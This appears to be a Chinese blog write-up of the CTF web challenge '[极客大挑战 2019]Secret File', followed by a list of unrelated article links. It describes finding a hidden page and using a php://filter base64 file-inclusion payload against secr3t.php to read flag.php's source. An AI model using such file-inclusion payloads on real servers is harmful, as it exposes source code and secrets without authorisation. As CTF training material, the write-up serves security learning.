当前位置: 首页 > news >正文

[极客大挑战 2019]Secret File-web

打开题目

查看源码

直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php

直接访问secr3t.php

代码审计一下

playload:secr3t.php?file=flag.php

改为php协议读取权限

secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码得到flag




 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 校园点餐系统
  • java算法递归算法练习-数组之和
  • 快速部署私有化大模型 毕昇(使用docker-compose方式)
  • Opencv threshold函数、adaptiveThreshold函数详解和示例
  • 【力扣】SQL题库练习5
  • actual combat 38 ——vue
  • 【C#】.net core 6.0 webapi 使用core版本的NPOI的Excel读取数据以及保存数据
  • 零基础学python 之 第十九讲 正则表达式
  • Express基于Node.js基础知识【2】全面总结 推荐
  • C++必修:STL之vector的了解与使用
  • JavaScript 变量声明var、let、const
  • 实验2-5-7 求阶乘序列前N项和【多看看函数】
  • 文件夹判断操作类 - C#小函数类推荐
  • 哈夫曼树及哈夫曼编码
  • 前端小白安装node、vue、Express、Electron及(Electron桌面端exe应用开发)
  • [分享]iOS开发-关于在xcode中引用文件夹右边出现问号的解决办法
  • 2017前端实习生面试总结
  • electron原来这么简单----打包你的react、VUE桌面应用程序
  • EventListener原理
  • Fastjson的基本使用方法大全
  • Java面向对象及其三大特征
  • Js基础知识(一) - 变量
  • Spring声明式事务管理之一:五大属性分析
  • TypeScript迭代器
  • vue-cli3搭建项目
  • vue-router的history模式发布配置
  • 百度贴吧爬虫node+vue baidu_tieba_crawler
  • 动态魔术使用DBMS_SQL
  • 记一次删除Git记录中的大文件的过程
  • 漫谈开发设计中的一些“原则”及“设计哲学”
  • 排序算法学习笔记
  • 前端_面试
  • 深度学习在携程攻略社区的应用
  • 思维导图—你不知道的JavaScript中卷
  • 我的zsh配置, 2019最新方案
  • 想晋级高级工程师只知道表面是不够的!Git内部原理介绍
  • 以太坊客户端Geth命令参数详解
  • 3月7日云栖精选夜读 | RSA 2019安全大会:企业资产管理成行业新风向标,云上安全占绝对优势 ...
  • ​LeetCode解法汇总1276. 不浪费原料的汉堡制作方案
  • ​什么是bug?bug的源头在哪里?
  • ## 临床数据 两两比较 加显著性boxplot加显著性
  • ###C语言程序设计-----C语言学习(6)#
  • #android不同版本废弃api,新api。
  • #if和#ifdef区别
  • #stm32驱动外设模块总结w5500模块
  • (19)夹钳(用于送货)
  • (Matalb回归预测)PSO-BP粒子群算法优化BP神经网络的多维回归预测
  • (pytorch进阶之路)CLIP模型 实现图像多模态检索任务
  • (不用互三)AI绘画工具应该如何选择
  • (读书笔记)Javascript高级程序设计---ECMAScript基础
  • (附源码)流浪动物保护平台的设计与实现 毕业设计 161154
  • (免费领源码)python#django#mysql公交线路查询系统85021- 计算机毕业设计项目选题推荐
  • (求助)用傲游上csdn博客时标签栏和网址栏一直显示袁萌 的头像
  • (十五)devops持续集成开发——jenkins流水线构建策略配置及触发器的使用
  • (一)Neo4j下载安装以及初次使用